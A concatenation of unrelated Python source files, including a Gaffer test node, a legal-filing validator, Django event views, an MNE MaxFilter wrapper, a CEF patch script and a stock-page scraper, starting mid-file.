if not os.path.isdir( directory ) :
raise
text = self.__processText( context )
with file( fileName, self["mode"].getValue() ) as f :
f.write( text )
def executeSequence( self, frames ) :
if not self.__requiresSequenceExecution :
GafferDispatch.TaskNode.executeSequence( self, frames )
return
context = Gaffer.Context( Gaffer.Context.current() )
fileName = self["fileName"].getValue()
with file( fileName, self["mode"].getValue() ) as f :
with context :
for frame in frames :
context.setFrame( frame )
text = self.__processText( context )
f.write( text )
def hash( self, context ) :
h = GafferDispatch.TaskNode.hash( self, context )
h.append( context.getFrame() )
h.append( context.get( "textWriter:replace", IECore.StringVectorData() ) )
self["fileName"].hash( h )
self["mode"].hash( h )
self["text"].hash( h )
return h
def requiresSequenceExecution( self ) :
return self.__requiresSequenceExecution
def __processText( self, context ) :
text = self["text"].getValue()
replace = context.get( "textWriter:replace", IECore.StringVectorData() )
if replace and len(replace) == 2 :
text = text.replace( replace[0], replace[1] )
return text
IECore.registerRunTimeTyped( TextWriter, typeName = "GafferDispatchTest::TextWriter" )
|
# Copyright © 2022 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validation for the Change of Registration filing."""
from http import HTTPStatus # pylint: disable=wrong-import-order
from typing import Dict, Optional
from flask_babel import _ as babel # noqa: N813, I004, I001, I003
from legal_api.errors import Error
from legal_api.models import Business
from legal_api.services.filings.validations.registration import (
validate_naics,
validate_name_request,
validate_offices,
validate_party,
validate_registration_court_order,
)
from ...utils import get_str
def validate(filing: Dict) -> Optional[Error]:
"""Validate the Change of Registration filing."""
filing_type = 'changeOfRegistration'
if not filing:
return Error(HTTPStatus.BAD_REQUEST, [{'error': babel('A valid filing is required.')}])
legal_type_path = '/filing/business/legalType'
legal_type = get_str(filing, legal_type_path)
if legal_type not in [Business.LegalTypes.SOLE_PROP.value, Business.LegalTypes.PARTNERSHIP.value]:
return Error(
HTTPStatus.BAD_REQUEST,
[{'error': babel('A valid legalType is required.'), 'path': legal_type_path}]
)
msg = []
if filing.get('filing', {}).get('changeOfRegistration', {}).get('nameRequest', None):
msg.extend(validate_name_request(filing, filing_type))
if filing.get('filing', {}).get('changeOfRegistration', {}).get('parties', None):
msg.extend(validate_party(filing, legal_type, filing_type))
if filing.get('filing', {}).get('changeOfRegistration', {}).get('offices', None):
msg.extend(validate_offices(filing, filing_type))
msg.extend(validate_naics(filing, filing_type))
msg.extend(validate_registration_court_order(filing, filing_type))
if msg:
return Error(HTTPStatus.BAD_REQUEST, msg)
return None
|
import tensorflow as tf
from tensorflow import keras
import face_recognition as fr
from django.contrib.staticfiles import finders
from django.conf import settings
import numpy as np
model_path = finders.find('files/model.h5')
model = tf.keras.models.load_model(model_path)
model.summary()
def predict(image_path):
image = fr.load_image_file(settings.MEDIA_ROOT + '/' + image_path)
face_encoding = fr.face_encodings(image)
if len(face_encoding) <= 0:
return 'None'
predict = model.predict(np.array(face_encoding).reshape(1, 128))
if predict[0] > 0.5:
return 'Male'
return 'Female'
|
from vms.models import Image
for img in Image.objects.filter(access=Image.INTERNAL):
img.access = Image.PRIVATE
img.save()
print('Updated image: %s' % img)
|
#!/usr/bin/env python2
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Utility to dump codepoints in a font.
Prints codepoints supported by the font, one per line, in hex (0xXXXX).
"""
import os
import sys
import unicodedata
import gflags as flags
from gftools.util import google_fonts as fonts
from google.apputils import app
FLAGS = flags.FLAGS
flags.DEFINE_bool('show_char', False, 'Print the actual character')
flags.DEFINE_bool('show_subsets', False,
'Print what subsets, if any, char is in')
def main(argv):
if len(argv) < 2:
sys.exit('Must specify one or more font files.')
cps = set()
for filename in argv[1:]:
if not os.path.isfile(filename):
sys.exit('%s is not a file' % filename)
cps |= fonts.CodepointsInFont(filename)
for cp in sorted(cps):
show_char = ''
if FLAGS.show_char:
show_char = (' ' + unichr(cp).strip() + ' ' +
unicodedata.name(unichr(cp), ''))
show_subset = ''
if FLAGS.show_subsets:
show_subset = ' subset:%s' % ','.join(fonts.SubsetsForCodepoint(cp))
print (u'0x%04X%s%s' % (cp, show_char, show_subset)).strip().encode('UTF-8')
if __name__ == '__main__':
app.run()
|
import unittest
from remove_duplicates_sorted_array import remove_duplicates
class Test(unittest.TestCase):
nums = [1, 1, 2]
nums_2 = [0,0,1,1,1,2,2,3,3,4]
def test_removes_duplicates_1(self):
actual = remove_duplicates(self.nums)
expected = 2
self.assertEqual(actual, expected)
def test_removes_duplicates_2(self):
actual = remove_duplicates(self.nums_2)
expected = 5
self.assertEqual(actual, expected)
if __name__ == "__main__":
unittest.main()
|
"""
This script is for dev/admin to migrate quicksight assets accross accounts or regions
Author: Ying Wang
Email: wangzyn@amazon.com or ywangufl@gmail.com
Version: Nov-20-2021
Note:
configuration are in ./config folder
library are in ./library folder
imported functions are in ./src folder
migration folder is for migrating exisiting QS assets accross differnt accounts/regions.
exported_results folder stores some sample QS API exported results.
log folder stores logs
Thank you and enjoy the open source self-service BI!
"""
"""
Import libraries
"""
import sys
import boto3
import json
import time
from Migration_scripts.Assets_as_Code.src import functions as func
from Migration_scripts.Assets_as_Code.src import supportive_functions as s_func
import logging
from typing import Any, Dict, List, Optional
from datetime import datetime
"""
#load dev account configuration
#load prod account configuration
"""
f = open('config/dev_configuration.json', )
dev_config = json.load(f)
f = open('config/prod_configuration.json', )
prod_config = json.load(f)
"""
Migration List:
* for migrate_p
"all" will migrate data source, dataset, theme, analysis and dashboard;
"source" means data sources only;
"dataset" means datasets only;
"theme" means theme only;
"analysis" means analysis only;
"dashboard" means dashboard only
"""
migrate_p = 'dashboard'
"""
Sample migration list input, please pick up one of them and then comment out the others
"""
data_source_migrate_list = ["redshift-auto", "mssql", "athena_1","redshift_manual"]
data_set_migrate_list = ["patient_info"]
theme_migrate_list= ["orange"]
analysis_migrate_list= ["QuickSight_Access_Last_24_H_Analysis","Marketing Analysis"]
dashboard_migrate_list = ["QuickSight_Access_Last_24_H", "Marketing Dashboard"]
"""
Process the input to get the finalized migration list
"""
m_list = func.process_migration_list(migrate_p, analysis_migrate_list, dev_config)
"""
Run the migration
"""
res = func.incremental_migration(dev_config, prod_config, migrate_p, m_list)
|
import datetime
import grequests
import requests
import json
import logging
from django.core.urlresolvers import reverse
from django.core.exceptions import PermissionDenied
from django.core.exceptions import ValidationError
from django.http import HttpResponseRedirect
from django.http import HttpResponseBadRequest
from django.http import HttpResponse
from django.shortcuts import render
from django.shortcuts import redirect
from django.views.decorators.cache import cache_control
from django.views.decorators.http import require_http_methods
from django.views.decorators.http import require_safe
from core.views import respond_with_error
from core.views import require_authentication
from core.views import process_attachments
from core.views import build_pagination_links
from core.views import build_newest_comment_link
from core.api.exceptions import APIException
from core.api.resources import build_url
from core.api.resources import Attachment
from core.api.resources import AttendeeList
from core.api.resources import Comment
from core.api.resources import Event
from core.api.resources import GeoCode
from core.api.resources import Profile
from core.api.resources import response_list_to_dict
from core.api.resources import Site
from core.forms.forms import EventCreate
from core.forms.forms import EventEdit
from core.forms.forms import CommentForm
logger = logging.getLogger('events.views')
create_form = EventCreate
edit_form = EventEdit
form_template = 'forms/event.html'
single_template = 'event.html'
comment_form = CommentForm
@require_safe
def single(request, event_id):
"""
Display a single event with comments and attendees.
"""
# Comment offset.
try:
offset = int(request.GET.get('offset', 0))
except ValueError:
offset = 0
# Create request for event resource.
event_url, event_params, event_headers = Event.build_request(request.get_host(), id=event_id,
offset=offset, access_token=request.access_token)
request.view_requests.append(grequests.get(event_url, params=event_params, headers=event_headers))
# Create request for event attendees.
att_url, att_params, att_headers = Event.build_attendees_request(request.get_host(), event_id,
request.access_token)
request.view_requests.append(grequests.get(att_url, params=att_params, headers=att_headers))
# Perform requests and instantiate view objects.
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
event = Event.from_api_response(responses[event_url])
comment_form = CommentForm(initial=dict(itemId=event_id, itemType='event'))
user = Profile(responses[request.whoami_url], summary=False) if request.whoami_url else None
attendees = AttendeeList(responses[att_url])
attendees_yes = []
attendees_invited = []
user_is_attending = False
for attendee in attendees.items.items:
if attendee.rsvp == 'yes':
attendees_yes.append(attendee)
if request.whoami_url:
if attendee.profile.id == user.id:
user_is_attending = True
elif attendee.rsvp == 'maybe':
attendees_invited.append(attendee)
# Determine whether the event spans more than one day and if it has expired.
# TODO: move stuff that is purely rendering to the template.
today = datetime.datetime.now()
if hasattr(event, 'when'):
end_date = event.when + datetime.timedelta(minutes=event.duration)
is_same_day = False
if end_date.strftime('%d%m%y') == event.when.strftime('%d%m%y'):
is_same_day = True
event_dates = {
'type': 'multiple' if not is_same_day else 'single',
'end': end_date
}
is_expired = True if int(end_date.strftime('%s')) < int(today.strftime('%s')) else False
else:
event_dates = {
'type': 'tba'
}
is_expired = False
# Why is this a minimum of 10%?
rsvp_percentage = event.rsvp_percentage
if len(attendees_yes) and event.rsvp_percentage < 10:
rsvp_percentage = 10
# Fetch attachments for all comments on this page.
# TODO: the code that does this should be in one place.
attachments = {}
for comment in event.comments.items:
c = comment.as_dict
if 'attachments' in c:
c_attachments = Attachment.retrieve(request.get_host(), "comments", c['id'],
access_token=request.access_token)
attachments[str(c['id'])] = c_attachments
view_data = {
'user': user,
'site': Site(responses[request.site_url]),
'content': event,
'comment_form': comment_form,
'pagination': build_pagination_links(responses[event_url]['comments']['links'], event.comments),
'item_type': 'event',
'attendees': attendees,
'attendees_yes': attendees_yes,
'attendees_invited': attendees_invited,
'user_is_attending': user_is_attending,
'event_dates': event_dates,
'rsvp_num_attending': len(attendees_yes),
'rsvp_num_invited': len(attendees_invited),
'rsvp_percentage': rsvp_percentage,
'is_expired': is_expired,
'attachments': attachments
}
return render(request, single_template, view_data)
@require_authentication
@require_safe
def csv(request, event_id):
"""
Downloads a CSV file containing event attendees.
"""
return redirect(
build_url(
request.get_host(),
["events", "%s", "attendeescsv"]
) % (
event_id,
) + "?access_token=" + request.access_token,
)
@require_authentication
@require_http_methods(['GET', 'POST',])
@cache_control(must_revalidate=True, max_age=0)
def create(request, microcosm_id):
"""
Create an event within a microcosm.
"""
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
view_data = {
'user': Profile(responses[request.whoami_url], summary=False),
'site': Site(responses[request.site_url]),
}
user = Profile(responses[request.whoami_url], summary=False) if request.whoami_url else None
if request.method == 'POST':
form = create_form(request.POST)
if form.is_valid():
event_request = Event.from_create_form(form.cleaned_data)
try:
event_response = event_request.create(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
# invite attendees
invites = request.POST.get('invite')
if len(invites.strip()) > 0:
invited_list = invites.split(",")
attendees = []
if len(invited_list) > 0:
for userid in invited_list:
if userid != "":
attendees.append({
'rsvp': 'maybe',
'profileId': int(userid)
})
if len(attendees) > 0:
try:
response = Event.rsvp_api(request.get_host(), event_response.id, user.id, attendees, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
if response.status_code != requests.codes.ok:
return HttpResponseBadRequest()
# create comment
if request.POST.get('firstcomment') and len(request.POST.get('firstcomment')) > 0:
payload = {
'itemType': 'event',
'itemId': event_response.id,
'markdown': request.POST.get('firstcomment'),
'inReplyTo': 0
}
comment_req = Comment.from_create_form(payload)
try:
comment = comment_req.create(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
try:
process_attachments(request, comment)
except ValidationError:
responses = response_list_to_dict(grequests.map(request.view_requests))
comment_form = CommentForm(
initial={
'itemId': comment.item_id,
'itemType': comment.item_type,
'comment_id': comment.id,
'markdown': request.POST['markdown'],
})
view_data = {
'user': Profile(responses[request.whoami_url], summary=False),
'site': Site(responses[request.site_url]),
'content': comment,
'comment_form': comment_form,
'error': 'Sorry, one of your files was over 5MB. Please try again.',
}
return render(request, form_template, view_data)
return HttpResponseRedirect(reverse('single-event', args=(event_response.id,)))
else:
print 'Event form is not valid'
view_data['form'] = form
view_data['microcosm_id'] = microcosm_id
return render(request, form_template, view_data)
if request.method == 'GET':
view_data['form'] = create_form(initial=dict(microcosmId=microcosm_id))
view_data['microcosm_id'] = microcosm_id
return render(request, form_template, view_data)
@require_authentication
@require_http_methods(['GET', 'POST',])
@cache_control(must_revalidate=True, max_age=0)
def edit(request, event_id):
"""
Edit an event.
"""
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
view_data = {
'user': Profile(responses[request.whoami_url], summary=False),
'site': Site(responses[request.site_url]),
'state_edit': True
}
if request.method == 'POST':
form = edit_form(request.POST)
if form.is_valid():
event_request = Event.from_edit_form(form.cleaned_data)
try:
event_response = event_request.update(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
return HttpResponseRedirect(reverse('single-event', args=(event_response.id,)))
else:
view_data['form'] = form
view_data['microcosm_id'] = form['microcosmId']
return render(request, form_template, view_data)
if request.method == 'GET':
try:
event = Event.retrieve(request.get_host(), id=event_id, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
view_data['form'] = edit_form.from_event_instance(event)
view_data['microcosm_id'] = event.microcosm_id
try:
view_data['attendees'] = Event.get_attendees(host=request.get_host(), id=event_id,
access_token=request.access_token)
attendees_json = []
for attendee in view_data['attendees'].items.items:
attendees_json.append({
'id': attendee.profile.id,
'profileName': attendee.profile.profile_name,
'avatar': attendee.profile.avatar,
'sticky': 'true'
})
if len(attendees_json) > 0:
view_data['attendees_json'] = json.dumps(attendees_json)
except APIException:
# Missing RSVPs is not critical, but we should know if it doesn't work.
logger.error(str(APIException))
pass
return render(request, form_template, view_data)
@require_authentication
@require_http_methods(['POST',])
def delete(request, event_id):
"""
Delete an event and be redirected to the parent microcosm.
"""
event = Event.retrieve(request.get_host(), event_id, access_token=request.access_token)
try:
event.delete(request.get_host(), request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
return HttpResponseRedirect(reverse('single-microcosm', args=(event.microcosm_id,)))
@require_authentication
@require_safe
def newest(request, event_id):
"""
Get redirected to the first unread post in an event.
"""
try:
response = Event.newest(request.get_host(), event_id, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
redirect = build_newest_comment_link(response, request)
return HttpResponseRedirect(redirect)
@require_authentication
@require_http_methods(['POST',])
def rsvp(request, event_id):
"""
Create an attendee (RSVP) for an event. An attendee can be in one of four states:
invited, yes, maybe, no.
"""
responses = response_list_to_dict(grequests.map(request.view_requests))
user = Profile(responses[request.whoami_url], summary=False)
attendee = [dict(rsvp=request.POST['rsvp'],profileId=user.id),]
try:
response = Event.rsvp_api(request.get_host(), event_id, user.id, attendee, access_token=request.access_token)
except APIException as exc:
return respond_with_error(request, exc)
if response.status_code != requests.codes.ok:
return HttpResponseBadRequest()
return HttpResponseRedirect(reverse('single-event', args=(event_id,)))
def geocode(request):
if request.access_token is None:
raise PermissionDenied
if request.GET.has_key('q'):
response = GeoCode.retrieve(request.get_host(), request.GET['q'], request.access_token)
return HttpResponse(response, content_type='application/json')
else:
return HttpResponseBadRequest()
|
# Authors: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Matti Hamalainen <msh@nmr.mgh.harvard.edu>
# Martin Luessi <mluessi@nmr.mgh.harvard.edu>
#
# License: BSD (3-clause)
from ..externals.six import string_types
import os
from ..bem import fit_sphere_to_headshape
from ..io import read_raw_fif
from ..utils import logger, verbose, warn
from ..externals.six.moves import map
def _mxwarn(msg):
warn('Possible MaxFilter bug: %s, more info: '
'http://imaging.mrc-cbu.cam.ac.uk/meg/maxbugs' % msg)
@verbose
def apply_maxfilter(in_fname, out_fname, origin=None, frame='device',
bad=None, autobad='off', skip=None, force=False,
st=False, st_buflen=16.0, st_corr=0.96, mv_trans=None,
mv_comp=False, mv_headpos=False, mv_hp=None,
mv_hpistep=None, mv_hpisubt=None, mv_hpicons=True,
linefreq=None, cal=None, ctc=None, mx_args='',
overwrite=True, verbose=None):
""" Apply NeuroMag MaxFilter to raw data.
Needs Maxfilter license, maxfilter has to be in PATH
Parameters
----------
in_fname : string
Input file name
out_fname : string
Output file name
origin : array-like or string
Head origin in mm. If None it will be estimated from headshape points.
frame : string ('device' or 'head')
Coordinate frame for head center
bad : string, list (or None)
List of static bad channels. Can be a list with channel names, or a
string with channels (names or logical channel numbers)
autobad : string ('on', 'off', 'n')
Sets automated bad channel detection on or off
skip : string or a list of float-tuples (or None)
Skips raw data sequences, time intervals pairs in sec,
e.g.: 0 30 120 150
force : bool
Ignore program warnings
st : bool
Apply the time-domain MaxST extension
st_buflen : float
MaxSt buffer length in sec (disabled if st is False)
st_corr : float
MaxSt subspace correlation limit (disabled if st is False)
mv_trans : string (filename or 'default') (or None)
Transforms the data into the coil definitions of in_fname, or into the
default frame (None: don't use option)
mv_comp : bool (or 'inter')
Estimates and compensates head movements in continuous raw data
mv_headpos : bool
Estimates and stores head position parameters, but does not compensate
movements (disabled if mv_comp is False)
mv_hp : string (or None)
Stores head position data in an ascii file
(disabled if mv_comp is False)
mv_hpistep : float (or None)
Sets head position update interval in ms (disabled if mv_comp is False)
mv_hpisubt : string ('amp', 'base', 'off') (or None)
Subtracts hpi signals: sine amplitudes, amp + baseline, or switch off
(disabled if mv_comp is False)
mv_hpicons : bool
Check initial consistency isotrak vs hpifit
(disabled if mv_comp is False)
linefreq : int (50, 60) (or None)
Sets the basic line interference frequency (50 or 60 Hz)
(None: do not use line filter)
cal : string
Path to calibration file
ctc : string
Path to Cross-talk compensation file
mx_args : string
Additional command line arguments to pass to MaxFilter
overwrite : bool
Overwrite output file if it already exists
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
origin: string
Head origin in selected coordinate frame
"""
# check for possible maxfilter bugs
if mv_trans is not None and mv_comp:
_mxwarn("Don't use '-trans' with head-movement compensation "
"'-movecomp'")
if autobad != 'off' and (mv_headpos or mv_comp):
_mxwarn("Don't use '-autobad' with head-position estimation "
"'-headpos' or movement compensation '-movecomp'")
if st and autobad != 'off':
_mxwarn("Don't use '-autobad' with '-st' option")
# determine the head origin if necessary
if origin is None:
logger.info('Estimating head origin from headshape points..')
raw = read_raw_fif(in_fname, add_eeg_ref=False)
r, o_head, o_dev = fit_sphere_to_headshape(raw.info, units='mm')
raw.close()
logger.info('[done]')
if frame == 'head':
origin = o_head
elif frame == 'device':
origin = o_dev
else:
RuntimeError('invalid frame for origin')
if not isinstance(origin, string_types):
origin = '%0.1f %0.1f %0.1f' % (origin[0], origin[1], origin[2])
# format command
cmd = ('maxfilter -f %s -o %s -frame %s -origin %s '
% (in_fname, out_fname, frame, origin))
if bad is not None:
# format the channels
if not isinstance(bad, list):
bad = bad.split()
bad = map(str, bad)
bad_logic = [ch[3:] if ch.startswith('MEG') else ch for ch in bad]
bad_str = ' '.join(bad_logic)
cmd += '-bad %s ' % bad_str
cmd += '-autobad %s ' % autobad
if skip is not None:
if isinstance(skip, list):
skip = ' '.join(['%0.3f %0.3f' % (s[0], s[1]) for s in skip])
cmd += '-skip %s ' % skip
if force:
cmd += '-force '
if st:
cmd += '-st '
cmd += ' %d ' % st_buflen
cmd += '-corr %0.4f ' % st_corr
if mv_trans is not None:
cmd += '-trans %s ' % mv_trans
if mv_comp:
cmd += '-movecomp '
if mv_comp == 'inter':
cmd += ' inter '
if mv_headpos:
cmd += '-headpos '
if mv_hp is not None:
cmd += '-hp %s ' % mv_hp
if mv_hpisubt is not None:
cmd += 'hpisubt %s ' % mv_hpisubt
if mv_hpicons:
cmd += '-hpicons '
if linefreq is not None:
cmd += '-linefreq %d ' % linefreq
if cal is not None:
cmd += '-cal %s ' % cal
if ctc is not None:
cmd += '-ctc %s ' % ctc
cmd += mx_args
if overwrite and os.path.exists(out_fname):
os.remove(out_fname)
logger.info('Running MaxFilter: %s ' % cmd)
if os.getenv('_MNE_MAXFILTER_TEST', '') != 'true': # fake maxfilter
st = os.system(cmd)
else:
print(cmd) # we can check the output
st = 0
if st != 0:
raise RuntimeError('MaxFilter returned non-zero exit status %d' % st)
logger.info('[done]')
return origin
|
'''
Created on 25 Dec 2016
@author: dusted-ipro
'''
import numpy as np
import collections
from environment.sensing import closestStar, closestStarSubSet
from environment import world
class baseClan(object):
'''
Base Clan Class
'''
def __init__(self, starIdx, coords, planetIdx, clanId, energyConsumeRate):
'''
Constructor
'''
self.clanId = clanId
self.clanName = 'clan_{}'.format(self.clanId)
#Where's home - these are the planet coords - not star
self.originCoords = coords
self.originName = ''
#Closest Star - index in world.starCoords
self.originStarIdx = starIdx
#Origin Planet
self.originPlanetIdx = planetIdx
#Array of all the clans agents - dict key lookup to world.agents
self.agents = []
#n Agents * n Agents matrix of link strength (2d array)
self.societyNet = np.zeros((len(self.agents), len(self.agents)))
#n Agents * n Agents matrix of demand and supply (3d array)
self.tradeNet = np.zeros((len(self.agents), len(self.agents), 2))
#Resource Knowledge {starIdx:{planetIdx:{'rawMat':X, 'energy':Y}}, planetIdx:{'rawMat':X, 'energy':Y}}}
#Initially populated with all stars - and no knowledge
self.resourceKnowledge = {}
#Agent job queues
#Explorer - (starIdx, starCoords) - unknown places
self.explorerQ = collections.deque()
#Harvestor - this is basically the resource knowledge sorted by distance
self.harvestorQ = collections.deque()
#Clan Global Resource storage
self.demands = {7:{'store':10.0}}
#{tradableId:storeAmount, ...}
self.store = {0:{'store':0.0}, 1:{'store':0.0}, 2:{'store':0.0},
3:{'store':0.0}, 4:{'store':0.0}, 5:{'store':0.0},
6:{'store':0.0}, 7:{'store':0.0}, 8:{'store':0.0},
9:{'store':0.0}, 10:{'store':0.0}}
self.consumes = {7:{'consumeRate':energyConsumeRate, 'store':10.0}}
def popn(self):
'''
Get the clans total population
::return int total number of agents
'''
return len(self.agents)
def agentPositions(self):
'''
Get the locations of all agents in this clan
::return array of agent.positions
'''
return [agent.position for agent in self.agents]
def societyStrength(self):
'''
Get some basic measure of the society network strength
::return float 0 (weak) -> 1(strong)
'''
return np.sum(self.societyNet)/len(self.agents)
def closestUnknownStar(self, coords):
'''
Get the star index of the closest clan unknown (unscanned) system
'''
uk = []
for k in self.resourceKnowledge.keys():
if self.resourceKnowledge[k] == {}:
uk.append(world.starCoords[k])
return closestStarSubSet(coords, uk)
def rxResourceKnowledge(self, inputKnowledge):
'''
Receive resource knowledge from an explorer or other
'''
for inK in inputKnowledge.keys():
#Check if star knowledge exists
if inK not in self.resourceKnowledge.keys():
#New star
self.resourceKnowledge[inK] = inputKnowledge[inK]
#Add all the planets to the harvestorQ - just the star and planet indexes as tuples
for p in inputKnowledge[inK].keys():
self.harvestorQ.append((inK, p, inputKnowledge[inK][p]))
else:
#Star exists - check we have all the planets
for inP in inputKnowledge[inK]:
if inP not in self.resourceKnowledge[inK].keys():
self.resourceKnowledge[inK][inP] = inputKnowledge[inK][inP]
#Add it to the resource Q
self.harvestorQ.append((inK, inP, inputKnowledge[inK][inP]))
#Reorder Harvestor Q - closest first
self.orderHarvestorQ()
def orderHarvestorQ(self):
'''
Take a moment to re-order the harvestorQ by distance from clan origin
So we can just pop the first one off at any stage
'''
dists = []
for i in self.harvestorQ:
dists.append(np.linalg.norm(world.stars[i[0]].planets[i[1]].position-self.originCoords))
chk = sorted(zip(dists, self.harvestorQ))
self.harvestorQ.clear()
for i in chk:
self.harvestorQ.append(i[1])
|
# Copyright (c) 2009 The Chromium Embedded Framework Authors. All rights
# reserved. Use of this source code is governed by a BSD-style license that
# can be found in the LICENSE file.
from __future__ import absolute_import
import pickle
from optparse import OptionParser
import os
import sys
from file_util import *
from git_util import git_apply_patch_file
# Cannot be loaded as a module.
if __name__ != "__main__":
sys.stdout.write('This file cannot be loaded as a module!')
sys.exit()
# The CEF root directory is the parent directory of _this_ script.
cef_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
cef_patch_dir = os.path.join(cef_dir, 'patch')
src_dir = os.path.abspath(os.path.join(cef_dir, os.pardir))
def write_note(type, note):
separator = '-' * 79 + '\n'
sys.stdout.write(separator)
sys.stdout.write('!!!! %s: %s\n' % (type, note))
sys.stdout.write(separator)
def apply_patch_file(patch_file, patch_dir):
''' Apply a specific patch file in optional patch directory. '''
patch_path = os.path.join(cef_patch_dir, 'patches', patch_file + '.patch')
if patch_dir is None or len(patch_dir) == 0:
patch_dir = src_dir
else:
if not os.path.isabs(patch_dir):
# Apply patch relative to the Chromium 'src' directory.
patch_dir = os.path.join(src_dir, patch_dir)
patch_dir = os.path.abspath(patch_dir)
result = git_apply_patch_file(patch_path, patch_dir)
if result == 'fail':
write_note('ERROR',
'This patch failed to apply. Your build will not be correct.')
return result
def apply_patch_config():
''' Apply patch files based on a configuration file. '''
config_file = os.path.join(cef_patch_dir, 'patch.cfg')
if not os.path.isfile(config_file):
raise Exception('Patch config file %s does not exist.' % config_file)
# Parse the configuration file.
scope = {}
exec (compile(open(config_file, "rb").read(), config_file, 'exec'), scope)
patches = scope["patches"]
results = {'apply': 0, 'skip': 0, 'fail': 0}
for patch in patches:
patch_file = patch['name']
dopatch = True
if 'condition' in patch:
# Check that the environment variable is set.
if patch['condition'] not in os.environ:
sys.stdout.write('\nSkipping patch file %s\n' % patch_file)
dopatch = False
if dopatch:
result = apply_patch_file(patch_file, patch['path']
if 'path' in patch else None)
results[result] += 1
if 'note' in patch:
write_note('NOTE', patch['note'])
else:
results['skip'] += 1
sys.stdout.write('\n%d patches total (%d applied, %d skipped, %d failed)\n' % \
(len(patches), results['apply'], results['skip'], results['fail']))
if results['fail'] > 0:
sys.stdout.write('\n')
write_note('ERROR',
'%d patches failed to apply. Your build will not be correct.' %
results['fail'])
sys.exit(1)
# Parse command-line options.
disc = """
This utility applies patch files.
"""
parser = OptionParser(description=disc)
parser.add_option(
'--patch-file', dest='patchfile', metavar='FILE', help='patch source file')
parser.add_option(
'--patch-dir',
dest='patchdir',
metavar='DIR',
help='patch target directory')
(options, args) = parser.parse_args()
if not options.patchfile is None:
apply_patch_file(options.patchfile, options.patchdir)
else:
apply_patch_config()
|
#!/usr/bin/python
import urllib2
import os
import sys
import time
from bs4 import BeautifulSoup
os.chdir('/home/yiwen/stockStrategies/addition')
def getRawContent(code,s=0):
t=60
while True:
try:
response=urllib2.urlopen('http://stockpage.10jqka.com.cn/%s/bonus/#additionprofile'%(code.strip()[2:]))
content=response.read()
soup=BeautifulSoup(content)
if soup.find('div',attrs={'class':'m_header'}) is not None:
return soup
except:
pass
time.sleep(t)
t+=60
def getAdditionProfile(content):
return content.find(attrs={'id':'additionprofile','class':'bd'})
def getConclusion(part):
return ''.join([s.strip().encode('utf8','ignore') for s in part.div.get_text().splitlines()])
def parseUnit(s):
if s.strip()=='--':
return 'NULL'
ssplits=s.strip().split(' ')
if len(ssplits)>3:
print 'Error:'+s.encode('utf8')
#sys.exit(1)
try:
tmp=str(float(ssplits[0]))
return tmp
except:
return 'NULL'
if len(ssplits)==1:
return "'"+s+"'"
if len(ssplits)==2:
if ssplits[1].find(u'\u4ebf')==0:
return str(float(ssplits[0])*100000000)
elif ssplits[1].find(u'\u4e07')==0:
return str(float(ssplits[0])*10000)
elif len(ssplits[1])==1:
return str(ssplits[0])
else:
print 'Error:'+s.encode('utf8')
sys.exit(1)
if len(ssplits)==3:
if ssplits[2].find(u'\u4ebf')==0:
return str(float(ssplits[1])*100000000)
elif ssplits[2].find(u'\u4e07')==0:
return str(float(ssplits[1])*10000)
elif len(ssplits[2])==1:
return str(ssplits[1])
else:
print 'Error:'+s.encode('utf8')
sys.exit(1)
def getFulltable(part):
i=0
data=[]
for s in part.stripped_strings:
if not s.strip()==u'\uff1a':
i+=1
if i%2==0:
data.append(parseUnit(s))
return data
if __name__=='__main__':
if len(sys.argv)<2:
print 'Usage:COMMAND <output>'
sys.exit(1)
if os.path.exists(sys.argv[1]):
print '%s file exists'%sys.argv[1]
sys.exit(1)
input=file('todo.list')
output=file(sys.argv[1],'w')
data4write=[]
while True:
data=input.readline()
if len(data)==0:
break
code=data.strip()[2:]
print code
sys.stdout.flush()
time.sleep(3)
soup=getRawContent(data)
targetDiv=getAdditionProfile(soup)
if targetDiv is not None:
tables=targetDiv.find_all('table',recursive=False)
for subtable in tables:
results=getFulltable(subtable)
try:
data4write.append('('+str(code)+','+','.join(results).encode('utf8','ignore')+')')
except:
pass
for i in range(0,len(data4write)):
if i<(len(data4write)-1):
output.write(data4write[i]+',\n')
else:
output.write(data4write[i]+';\n')
output.close()
|
#
# Copyright (c) 2013-present, Anoop Kunchukuttan
# All rights reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import pandas as pd
import numpy as np
import os
from indicnlp import common
from indicnlp.common import IndicNlpException
from indicnlp import langinfo as li
###
# Phonetic Information about script characters
###
""" Phonetic data about all languages except Tamil """
ALL_PHONETIC_DATA=None
""" Phonetic data for Tamil """
TAMIL_PHONETIC_DATA=None
""" Phonetic vector for all languages except Tamil """
ALL_PHONETIC_VECTORS=None
""" Phonetic vector for Tamil """
TAMIL_PHONETIC_VECTORS=None
""" Length of phonetic vector """
